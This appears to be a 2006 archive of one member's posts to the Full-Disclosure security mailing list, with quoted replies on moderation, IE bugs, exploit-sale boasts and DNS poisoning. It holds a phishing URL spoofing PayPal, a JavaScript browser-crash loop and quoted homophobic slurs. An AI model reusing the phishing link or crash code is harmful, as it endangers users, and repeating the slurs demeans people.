http://www.google.com/pagead/iclk?sa=l&ai=Br3ycNQz5Q-fXBJGSiQLU0eDSAueHkArnhtWZAu-FmQWgjlkQAxgFKAg4AEDKEUiFOVD-4r2f-P8BoAGyqor_A8gBAZUCCapCCqkCxU7NLQH0sz4&num=5&adurl=http://cpe-24-33-241-95.twmi.res.rr.com/www.paypal.com/cgi-bin/webscr=home=p/index.php

Found on PayPal spoof email.

Aaron


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Call for moderation

[Aaron Gray]

Regarding some previous 
threads.
 
Some people just show how low they are 
!
 
This is why we need some form of "Code of Conduct" or even 
better change to a moderated list.
 
Otherwise the whole list just gets ruined and will ndeteriate 
over time.
 
Heres a call for moderation before it gets too 
late.
 
Anything that is too off topic or inflamatory should 
get junked.
 
Aaron
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] blue security folds

[Aaron Gray]

Read this artical, both pages :-
 
    http://wired.com/news/technology/0,70913-0.html?tw=wn_index_1
Aaron

  - Original Message - 
  From: 
  Abuse 007 
  
  To: Mike Adams 
  Cc: full-disclosure@lists.grok.org.uk 
  
  Sent: Friday, May 19, 2006 7:31 AM
  Subject: Re: [Full-disclosure] blue 
  security folds
  This is a cop out. I don't believe they folded just because of 
  one DDoS attack.What did they do to try to mitigate it?I believe there 
  is a fair few anti-DDoS devices that will scrub/filter traffic.I also 
  believe that there is providers that will provide these sorts of servers. As 
  if an SP that specializing in protection from DDoS could not figure out how to 
  mitigate this attack.They are a technology company that is meant to 
  fight SPAM... I would think that they wouldn't just fold at the first 
  fight.My 2 cents.
  On 5/18/06, Mike 
  Adams <[EMAIL PROTECTED]> 
  wrote:
  I'm 
really disappointed.All this will do is give all the other scumbag 
spammers out there proofthat using these tactics will work, and they 
will be able to extortanyone.Who will be next, Trend Micro? 
Fortinet? Symantec? SANS? -Original Message-From: Gadi 
Evron [mailto:[EMAIL PROTECTED]]Sent: 
Wednesday, May 17, 2006 1:14 AMTo: full-disclosure@lists.grok.org.uk 
Subject: [Full-disclosure] blue security foldsI just got 
this in email:http://wired.com/news/technology/0,70913-0.html?tw=wn_index_1 
Gadi.--/~\ 
The Green\ / Ribbon Campaign  X  Against 
Purple/ \ Ribbons!-- 
"The Geometry of Shadows", Babylon 
5.___ 
Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted 
and sponsored by Secunia - http://secunia.com/___Full-Disclosure 
- We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html 
Hosted and sponsored by Secunia - http://secunia.com/
  
  

  ___Full-Disclosure - We 
  believe in it.Charter: 
  http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored 
  by Secunia - http://secunia.com/
  
  

  No virus found in this incoming message.Checked by AVG Free 
  Edition.Version: 7.1.392 / Virus Database: 268.6.1/344 - Release Date: 
  19/05/2006
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: **SPAM** Re: [Full-disclosure] Call for moderation

[Aaron Gray]

I see your email address is on a block list.

- Original Message - 
From: "Jason" <[EMAIL PROTECTED]>

To: "Aaron Gray" <[EMAIL PROTECTED]>
Cc: "Full Disclosure" 
Sent: Saturday, May 20, 2006 2:55 PM
Subject: **SPAM** Re: [Full-disclosure] Call for moderation



You are now permanently moderated off all lists. Welcome to the kill
file where you join the ranks of n3td3v and company. For a moderated
version of this list and many others you could check the countless
archives for the this specific topic or just visit -
https://lists.seifried.org/mailman/listinfo/security

Aaron Gray wrote:

Regarding some previous threads.
 
Some people just show how low they are !
 
This is why we need some form of "Code of Conduct" or even better change

to a moderated list.
 
Otherwise the whole list just gets ruined and will ndeteriate over time.
 
Heres a call for moderation before it gets too late.
 
Anything that is too off topic or inflamatory should get junked.
 
Aaron





___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



--
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.1.392 / Virus Database: 268.6.1/344 - Release Date: 19/05/2006




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: **SPAM** Re: [Full-disclosure] Call for moderation

[Aaron Gray]

You are now permanently moderated off all lists. Welcome to the kill
file where you join the ranks of n3td3v and company. For a moderated
version of this list and many others you could check the countless
archives for the this specific topic or just visit -


Get killlisted for complaining about racist ranting :(


https://lists.seifried.org/mailman/listinfo/security


I will subscribe to it and check it out.

Thanks,

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VulnSale: Windows Vista Exploit

[Aaron Gray]

Language please.

- Original Message - 
From: <[EMAIL PROTECTED]>

To: <[EMAIL PROTECTED]>
Cc: 
Sent: Monday, May 29, 2006 2:07 AM
Subject: Re: [Full-disclosure] VulnSale: Windows Vista Exploit



No, I have not been interviewed.  I am the fag that you gave a blow
job too last night in that truckstop bathroom.

On Fri, 26 May 2006 07:38:41 -0700 evilrabbi <[EMAIL PROTECTED]>
wrote:

are you the fag that was interviewed by the washington post?

On 5/25/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:


Due to the sucess of my IE vuln sale I have decided to sell a
Windows Vista exploit I discovered.  This one work remote and

will

run code.




Concerned about your privacy? Instantly send FREE secure email,

no account

required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





--
-- h0 h0 h0 --
www.nopsled.net




Concerned about your privacy? Instantly send FREE secure email, no account 
required

http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


--
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.1.394 / Virus Database: 268.7.2/349 - Release Date: 26/05/2006



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VulnSale: IE 6.0.2900.2180.yeahlatestversion

[Aaron Gray]

Windows is just about a holy as a cheese grater.

- Original Message - 
From: <[EMAIL PROTECTED]>

To: 
Sent: Monday, May 29, 2006 10:40 AM
Subject: [Full-disclosure] VulnSale: IE 6.0.2900.2180.yeahlatestversion



So I just found another IE vulnerability.  This time working on the
latest patched up verison of 6.0.  It allows for my code to be ran
and all that pretty shit.

Let the bidding begin.

PS:  Vista zero day sale ends Wednesday as I am already getting
more bids than I can keep track of. For the sake of making a
statement I have named the POC for this bug:
litchfieldcantbypassaslrcauseheslame.c

-kkk



Concerned about your privacy? Instantly send FREE secure email, no account 
required

http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


--
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.1.394 / Virus Database: 268.7.2/349 - Release Date: 26/05/2006



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VulnSale: IE 6.0.2900.2180.yeahlatestversion

[Aaron Gray]

On Mon, 29 May 2006 15:38:53 BST, Aaron Gray said:

Windows is just about a holy as a cheese grater.


With an important distinction - the Catholic Church (usually) does some 
pretty

stringent QA before they elevate somebody to sainthood.  In fact, part of
the process is where the phrase "Devil's Advocate" came from.  I've seen
little evidence that the Church of Redmond is equally careful


Whoopse my bad spelling :)

Aaron


- Original Message - 
From: <[EMAIL PROTECTED]>

To: "Aaron Gray" <[EMAIL PROTECTED]>
Cc: ; <[EMAIL PROTECTED]>
Sent: Monday, May 29, 2006 4:18 PM
Subject: Re: [Full-disclosure] VulnSale: IE 6.0.2900.2180.yeahlatestversion


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Internet Explorer Ver6.0.2800.1106 vulnerability

[Aaron Gray]

a simple crash can lead to code exec but some people don't have
knowledge/time to research it. they just report the crash and leave it
of somebody else to make the actual code execute. sometimes simple crash
is simple crash :-)) sometimes simple crash is remote code exec.

Javor Ninov aka DrFrancky
http://securitydot.net/


Look at the original post and you will see there is no where to inject any 
code.


Aaron



 var wwidth = (window.innerWidth)?window.innerWidth:
((document.all
)?document.body.offsetWidth:null);

 while (wwidth)
 {
self.resizeBy(-99, -1);
 }




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Internet Explorer Ver6.0.2800.1106 vulnerability

[Aaron Gray]

No *obvious* way to inject code.  Don't rule out something like this 
working:

Re: [Full-disclosure] Internet Explorer Ver6.0.2800.1106 vulnerability

[Aaron Gray]

Of course you can inject code into it.


Give us an working example then !:)

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Is your security 6/6/6 ready?

[Aaron Gray]

(*) That's *really* drunk: http://www.eforu.com/jokes/bartender/23.html


That contains (possibly multiple) IE exploits.

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Is your security 6/6/6 ready?

[Aaron Gray]

(*) That's *really* drunk: http://www.eforu.com/jokes/bartender/
23.html


That contains (possibly multiple) IE exploits.


Are you sure? All I can see is tacky ads... an IFRAME tag does not an
exploit make.


A rogue process started on first run. IE starts eating 96% of process time 
on every run.


Aaron



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Is your security 6/6/6 ready?

[Aaron Gray]

It may be because my system was not updated since May 14th as AutoUpdate has 
not worked since then, BUT has not warned me (nice one Microsoft). There has 
been a MS update since then, KB913580, which may have closed the 
vulnerability; possibly.


'adserving.budsinc.com' is being flagged up by anti-spyware.

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Is your security 6/6/6 ready?

[Aaron Gray]

Well thanks for the reply.

AutoUpdate aint been working as it shows up in the 'Update History' on 
Windows Update. And doing updates fails on "The Genuine Advantage" doobry 
whatsit.


And IE is eating 96% CPU time ! Thats all I know without looking deeper.

Aaron

- Original Message - 
From: "HTRegz" <[EMAIL PROTECTED]>
To: "'Aaron Gray'" <[EMAIL PROTECTED]>; "'Andrew Farmer'" <[EMAIL PROTECTED]>; 
"'Full Disclosure'" 

Cc: <[EMAIL PROTECTED]>
Sent: Monday, June 05, 2006 4:52 AM
Subject: RE: [Full-disclosure] Is your security 6/6/6 ready?


I'm not usually one to reply on FD... but I'm gonna have to respond to 
this

one.

A) How do you know that your "AutoUpdate" isn't working... There hasn't 
been

an update pushed out since the last Patch Tuesday (May 9th).
B) KB913580 references MS06-018 which was released during the May Patch
Tuesday (Again, May 9th... so you would have been updated at this time)...
C) I've got through the source for that page and the included javascript 
and

have found nothing out of the ordinary... I've also loaded in it multiple
browsers and watched what happened... there was no malicious behaviour..

Plenty of Advertising sites are flagged by anti spyware these days... 
solely

because they leave behind cookies..

Peace,
HT

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Aaron Gray
Sent: Sunday, June 04, 2006 8:24 PM
To: Andrew Farmer; Full Disclosure
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] Is your security 6/6/6 ready?

It may be because my system was not updated since May 14th as AutoUpdate 
has


not worked since then, BUT has not warned me (nice one Microsoft). There 
has


been a MS update since then, KB913580, which may have closed the
vulnerability; possibly.

'adserving.budsinc.com' is being flagged up by anti-spyware.

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

--
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.1.394 / Virus Database: 268.8.1/355 - Release Date: 6/2/2006


--
No virus found in this outgoing message.
Checked by AVG Free Edition.
Version: 7.1.394 / Virus Database: 268.8.1/355 - Release Date: 6/2/2006




--
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.1.394 / Virus Database: 268.8.2/356 - Release Date: 05/06/2006



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] n3td3v agenda revealed

[Aaron Gray]

n3td3v,


Intro:
We, the n3td3v group have come up with a good way to disturbute our
recently discovered zero-day vulnerability and exploit code.
How:
Everytime you sign up to the n3td3v group you recieve a welcome
message per unique e-mail address.
Scoop:
We plan to periodically release zero-day via the google group welcome
message, no longer are we using full-disclosure to reveal our dark
secret(s).


Okay I signed up to n3td3v Google group but there is no welcome message !

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] NewsForge Article: Can the malware industry be trusted?

[Aaron Gray]

Quite a good article :-
 
    
http://software.newsforge.com/article.pl?sid=06/06/06/1832223&from=rss
 
Aaron
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] NewsForge Article: Can the malware industrybetrusted?

[Aaron Gray]

Yes the title is really incorrect.

Should be "Can the security industry be trusted ?"

Aaron

- Original Message - 
From: "Patrick Nolan" <[EMAIL PROTECTED]>

To: "'Full Disclosure'" 
Sent: Thursday, June 08, 2006 9:30 PM
Subject: RE: [Full-disclosure] NewsForge Article: Can the malware 
industrybetrusted?





Aside of the quality of the article, the title of the article is a 
misnomer.


The "malware industry" would represent authors of malware, something that
the named organizations are not part of:

 "players like McAfee, Symantec, and dozens of other firms fight for a
share of a market worth tens-of-billions of dollars a year. I would like 
to
think that this industry displays the same high degree of ethical 
standards

and integrity shown by other first-responders..."

A proper (yet still silly) title could then be

"Can the antimalware industry be trusted?"

After reading the article, trust really wasn't at issue as much as the
author has a beef with certain organizations over the announcement of
alleged inflated statistics and also allegations of fear mongering.

Regards,

Patrick Nolan
Virus Researcher

____

From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Aaron Gray
Sent: Thursday, June 08, 2006 12:19 PM
To: Full Disclosure
Subject: [Full-disclosure] NewsForge Article: Can the malware
industry betrusted?


Quite a good article :-


http://software.newsforge.com/article.pl?sid=06/06/06/1832223&from=rss

Aaron


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


--
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.1.394 / Virus Database: 268.8.3/359 - Release Date: 08/06/2006



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] terrorists have invaded the united states

[Aaron Gray]

Never mind that, where's the zero day 
?

  - Original Message - 
  From: 
  n3td3v 
  To: full-disclosure@lists.grok.org.uk 
  
  Sent: Saturday, June 10, 2006 8:36 
  PM
  Subject: [Full-disclosure] terrorists 
  have invaded the united states
  
  Terrorists have invaded the united states
   
  Taken out your president
   
  Sacked your government
   
  Took over whitehouse
   
  Put Bush in court
   
  Because the terrorists said Bush had weapons of mass destruction
   
  No weapons were found
   
  The terrorists said it doesn't matter
   
  We're staying in America until the American people stop launching attacks 
  on the terrorists
   
  The terrorists have destroyed your area
   
  They bombed your schools
   
  Your neighbours are disabled for life
   
  The terrorists realise they've made a mistake and the American people 
  won't stop attacking them to get their country back
   
  The terrorists ask bin laden for help to stop the American people bombing 
  them so they can leave the united states
   
  Bin laden and the rest of the world decide not to take part
   
  Bin laden didn't want his own community bombed for helping the terrorists 
  regain control and security in America
   
  The terroirst say no bin laden you've got to help us, Bush bombed our 
  country and killed everyone in Iraq, you've got to help us
   
  Bin laden says no, the invasion of Iraq was wrong, and two wrongs don't 
  make a right
   
  The terrorists are left to inforce security and implement the whitehouse 
  and congress, the old congress and whitehouse officals were killed by the 
  terrorists, so now the terrorists need to restore claim amougst the American 
  people and say "We invaded America on good grounds, we thought you had weapons 
  of mass destruction, we didn't find any, we're sorry for killing half of the 
  American population" 
   
  The terrorists say they'll go back to Iraq and leave the American people 
  to get back to normal life
   
  The terorists tell Iraq, we're fighting America on their soil, so we 
  don't need to fight them in Iraq
   
  The Iraqi people don't believe the terrorists and ask them to leave 
  America
   
  The terrorists say we won't leave America until our job is done!
   
  Half the population of America is dead, : men, women, children
   
  You live in fear the terorists will bomb your community
   
  The terrorists say the war is over in America, although everyday the 
  American people are desperate and they decide to bomb city center shopping 
  centres in America to make sure the terrorists don't look as if they've 
  managed to take over America 
   
  The last thing the American people want is pictures on world wide tv of 
  the terrorists shaking hands with the American people in New York, picutres of 
  the American people welcoming the terrorists into America and praising them 
  for their good faith that they were looking for the weapons of mass 
  destruction 
   
  The American people want to make sure the terrorists are the most evil 
  people on the planet, they don't want them to be heros
   
  The Americans are not killers, but because of the biggest terrorist 
  attack on the planet that has destroyed everything the American people stood 
  for, the Americans have no choice but to fight the terrorists, until the 
  terrorists leave America! 
   
   
   
   
   
   
   
   
   
   
   
   
  
  

  ___Full-Disclosure - We 
  believe in it.Charter: 
  http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored 
  by Secunia - http://secunia.com/
  
  

  No virus found in this incoming message.Checked by AVG Free 
  Edition.Version: 7.1.394 / Virus Database: 268.8.3/360 - Release Date: 
  09/06/2006
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] n3td3v agenda revealed

[Aaron Gray]

and no 0days


Looks like bluff, nothing from n3td3v at all.


where the f**k are the 31ee7 k0d3z???


Things are just getting tighter. There are several vulnerabilities in
Windows XP at the moment, but no public exploit code as otherwise they just
get plugged. There is also a trick to stop Windows Update too...

Aaron


- Original Message - 
From: "<...>" <[EMAIL PROTECTED]>

To: "Aaron Gray" <[EMAIL PROTECTED]>; "n3td3v" <[EMAIL PROTECTED]>;

Sent: Thursday, June 08, 2006 9:50 AM
Subject: Re: [Full-disclosure] n3td3v agenda revealed



and no 0days
where the f**k are the 31ee7 k0d3z???

- Original Message - 
From: "Aaron Gray" <[EMAIL PROTECTED]>

To: "n3td3v" <[EMAIL PROTECTED]>; 
Sent: Wednesday, June 07, 2006 6:07 PM
Subject: Re: [Full-disclosure] n3td3v agenda revealed



n3td3v,


Intro:
We, the n3td3v group have come up with a good way to disturbute our
recently discovered zero-day vulnerability and exploit code.
How:
Everytime you sign up to the n3td3v group you recieve a welcome
message per unique e-mail address.
Scoop:
We plan to periodically release zero-day via the google group welcome
message, no longer are we using full-disclosure to reveal our dark
secret(s).


Okay I signed up to n3td3v Google group but there is no welcome message !

Aaron

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





--
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.1.394 / Virus Database: 268.8.3/359 - Release Date: 08/06/2006




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] All new anti-cyber terror website

[Aaron Gray]

Yes, but where are the promised zerodays 
?
 
vaporware ?

  - Original Message - 
  From: 
  n3td3v 
  To: full-disclosure@lists.grok.org.uk 
  ; [EMAIL PROTECTED] 
  Sent: Wednesday, June 14, 2006 6:03 
  PM
  Subject: [Full-disclosure] All new 
  anti-cyber terror website
  
  ===
   
  For public distribution.
   
  ===
   
  New website launched.
   
  ===
   
  n3td3v group launched a new website last night and is ready for web 
  traffic.
   
  ===
   
  We pride ourselves in our continued work with the underworld at Google 
  and Yahoo.
   
  ===
   
  We are a professional group of users with good intentions.
   
  ===
   
  Learn more about the all new n3td3v website today.
   
  ===
   
  Is your corporation Google or Yahoo? Have you ever wondered who is 
  behind your security incidents?...
   
  ===
   
  Its time for n3td3v, its time for http://n3td3v.googlepages.com
   
  ===
   
  Remember to click on the security, intelligence and network link(s) at 
  the top of the website!
   
  ===
   
  Many Thanks,
   
  ===
   
  n3td3v
  
  

  ___Full-Disclosure - We 
  believe in it.Charter: 
  http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored 
  by Secunia - http://secunia.com/
  
  

  No virus found in this incoming message.Checked by AVG Free 
  Edition.Version: 7.1.394 / Virus Database: 268.8.4/363 - Release Date: 
  13/06/2006
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Phishing and Spammers

[Aaron Gray]

Just another fucking rotten mess...

- Original Message - 
From: "Geo." <[EMAIL PROTECTED]>

To: 
Sent: Thursday, June 15, 2006 2:37 AM
Subject: Re: [Full-disclosure] Phishing and Spammers





"hey, a valid mail address, let's forward it to my buddy Joe Spammer and
his \/|agra pills"

It almost as bad as clicking the "remove" bait some spammers post within
their messages.


If you're replying to a spam you just received, assume we are beyond 
caring

about this.

Geo.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


--
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.1.394 / Virus Database: 268.8.4/363 - Release Date: 13/06/2006



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] tcpdump logfile viewer

[Aaron Gray]

Are there any viewers for tcpdump log files 
?
 
1)
    a) On Linux
    b) on Windows
    c) as an HTML 
server
2)
    a) text dump file
    b) binary dump file
 
Aaron
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] DNS poisoning

[Aaron Gray]

You would need to hack the program code of BIND or what ever DNS server 
software you are using.


Aaron

- Original Message - 
From: "Saeed Abu Nimeh" <[EMAIL PROTECTED]>

To: 
Sent: Tuesday, June 27, 2006 10:47 PM
Subject: [Full-disclosure] DNS poisoning



Is there a way to do dns poisoning and make the poisoned server provide
legitimate queries when doing dns lookup. Example: Assume I am running a
poisoned dns server, when user X does lookup yahoo.com or dig yahoo.com
I reply with legit yahoo entries, however, when user Y does the same
thing I provide fake or spoofed entires.
Thanks,
Saeed

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


--
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.1.394 / Virus Database: 268.9.5/377 - Release Date: 27/06/2006



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Weird... www.eon8.com

[Aaron Gray]

Looks pritty omonous, I would not log onto 
it if I were you until tommorow.
 
There is a counter down counting, 4 hours 35 
minutes to go. Its logging your IP address as well.
 
Dont know maybe nothing but it looks a bit omonous 
as I said.
 
If I do not post a message within 5 hours you will 
know that I have been cracked :)
 
Aaron
 
- Original Message - 
From: "Jay Buhrt" <[EMAIL PROTECTED]>
To: 
Sent: Friday, June 30, 2006 10:13 PM
Subject: **SPAM** [Full-disclosure] Weird... 
www.eon8.com
> Does anyone know about this site, or the projects related to it? 
> www.eon8.com ?> > -- 
> Jay Buhrt> Achievement Focused Technology, Inc.> 
[EMAIL PROTECTED]> 
574-538-8944> > 
___> Full-Disclosure - We 
believe in it.> Charter: http://lists.grok.org.uk/full-disclosure-charter.html> Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: **SPAM** [Full-disclosure] Weird... www.eon8.com

[Aaron Gray]

The counter restarts with a different time each time you refresh the page, 
so not so omonous !


Aaron

- Original Message - 
From: "Jay Buhrt" <[EMAIL PROTECTED]>

To: 
Sent: Friday, June 30, 2006 10:13 PM
Subject: **SPAM** [Full-disclosure] Weird... www.eon8.com


Does anyone know about this site, or the projects related to it? 
www.eon8.com ?


--
Jay Buhrt
Achievement Focused Technology, Inc.
[EMAIL PROTECTED]
574-538-8944

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/ 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: **SPAM** [Full-disclosure] Weird... www.eon8.com

[Aaron Gray]

Just being careful.

Phew, I thought some evil organization was just about to hack the world with 
a new 0day :)


Aaron

- Original Message - 
From: "Cardoso" <[EMAIL PROTECTED]>

To: 
Sent: Saturday, July 01, 2006 12:40 AM
Subject: Re: **SPAM** [Full-disclosure] Weird... www.eon8.com


it was digged a few hours ago.

people agreed it's a viral for a game, or something.

of course conspiracy buffs are LOVING the idea of some evil organization
USING A FRACKING WEBSITE to talk to their members...



On Sat, 1 Jul 2006 00:30:49 +0100
"Aaron Gray" <[EMAIL PROTECTED]> wrote:

AG> The counter restarts with a different time each time you refresh the 
page,

AG> so not so omonous !
AG>
AG> Aaron
AG>
AG> - Original Message - 
AG> From: "Jay Buhrt" <[EMAIL PROTECTED]>

AG> To: 
AG> Sent: Friday, June 30, 2006 10:13 PM
AG> Subject: **SPAM** [Full-disclosure] Weird... www.eon8.com
AG>
AG>
AG> > Does anyone know about this site, or the projects related to it?
AG> > www.eon8.com ?
AG> >
AG> > -- 
AG> > Jay Buhrt

AG> > Achievement Focused Technology, Inc.
AG> > [EMAIL PROTECTED]
AG> > 574-538-8944
AG> >
AG> > ___
AG> > Full-Disclosure - We believe in it.
AG> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
AG> > Hosted and sponsored by Secunia - http://secunia.com/
AG>
AG> ___
AG> Full-Disclosure - We believe in it.
AG> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
AG> Hosted and sponsored by Secunia - http://secunia.com/
AG>

year(now) + 1 será o ano do linux!
Cardoso <[EMAIL PROTECTED]> - SkypeIn: (11) 3711-2466 / (41) 3941-5299
vida digital: http://www.contraditorium.com site pessoal e blog: 
http://www.carloscardoso.com


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/ 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [OT] "Shellcoder's Handbook", 2nd edition?

[Aaron Gray]

2nd edition is 800 pages compared to the 620 pages of the first edition.

Aaron

- Original Message - 
From: "Byron Sonne" <[EMAIL PROTECTED]>

To: 
Sent: Wednesday, July 12, 2006 7:11 PM
Subject: [Full-disclosure] [OT] "Shellcoder's Handbook", 2nd edition?


Fantastic book - great stuff and an excellent read. Does anyone know if a 
2nd edition is planned to correct the errors in the book and/or fine tune 
the examples? Didn't find anything on the wiley.com.


Cheers,
B

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


--
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.1.394 / Virus Database: 268.9.10/386 - Release Date: 12/07/2006



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [OT] "Shellcoder's Handbook", 2nd edition?

[Aaron Gray]




No, not yet in UK anyway. Amazon are taking 
advanced orders.
 
Amazon says there are 620 pages in first edition, 
is this so or not ?
 
- Original Message - 

  From: 
  Peter Dawson 
  
  To: full-disclosure@lists.grok.org.uk 
  
  Sent: Thursday, July 13, 2006 12:00 
  AM
  Subject: Re: [Full-disclosure] [OT] 
  "Shellcoder's Handbook", 2nd edition?
  
  Is this available  order ??  I am only seeing the 1st edition 
  in the stores - paperback 648pp  
  On 7/12/06, Aaron 
  Gray <[EMAIL PROTECTED]> 
  wrote: 
  2nd 
edition is 800 pages compared to the 620 pages of the first 
edition.Aaron- Original Message - From: "Byron 
Sonne" <[EMAIL PROTECTED]>To: <full-disclosure@lists.grok.org.uk>Sent: 
Wednesday, July 12, 2006 7:11 PM Subject: [Full-disclosure] [OT] 
"Shellcoder's Handbook", 2nd edition?> Fantastic book - great 
stuff and an excellent read. Does anyone know if a> 2nd edition is 
